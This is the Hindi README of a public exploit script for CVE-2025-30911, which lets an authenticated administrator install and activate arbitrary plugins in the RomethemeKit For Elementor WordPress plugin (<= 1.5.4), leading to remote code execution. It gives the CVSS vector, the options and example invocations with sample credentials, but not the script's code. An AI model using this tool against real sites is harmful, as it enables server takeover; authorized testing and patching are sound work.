
WordPress RomethemeKit For Elementor Plugin <= 1.5.4 में Remote Code Execution (RCE) की भेद्यता है।
यह स्क्रिप्ट RomethemeKit For Elementor WordPress प्लगइन (<= v1.5.4) में एक गंभीर भेद्यता का शोषण करती है जो प्रमाणित मनमाना प्लगइन स्थापना और सक्रियण की अनुमति देता है, जो संभावित रूप से रिमोट कोड निष्पादन (RCE) की ओर ले जाता है।
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Hयह भेद्यता एक प्रमाणित हमलावर (व्यवस्थापक पहुँच के साथ) को प्रोग्रामेटिक रूप से किसी भी प्लगइन — जिसमें संभावित रूप से दुर्भावनापूर्ण प्लगइन शामिल हैं — को स्थापित और सक्रिय करने की अनुमति देती है, जो सर्वर पर पूर्ण कोड निष्पादन की ओर ले जा सकता है।
python3 CVE-2025-30911.py -u http://target/wordpress -un admin -p password -pl hello-dolly/hello.php
usage:
CVE-2025-30911.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit For CVE-2025-30911 | By Nxploited Khaled Alenazi
options:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-u, --url URL WordPress साइट का आधार URL
-un, --username USERNAME WordPress व्यवस्थापक उपयोगकर्ता नाम
-p, --password PASSWORD WordPress व्यवस्थापक पासवर्ड
-pl, --plugin PLUGIN स्थापित करने के लिए प्लगइन (डिफ़ॉल्ट: hello-dolly/hello.php)
python3 CVE-2025-30911.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl hello-dolly/hello.php
requests लाइब्रेरी (pip install requests के माध्यम से स्थापित करें)यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। अनाधिकृत उपयोग अवैध और अनैतिक है।
By: Nxploited | Khaled Alenazi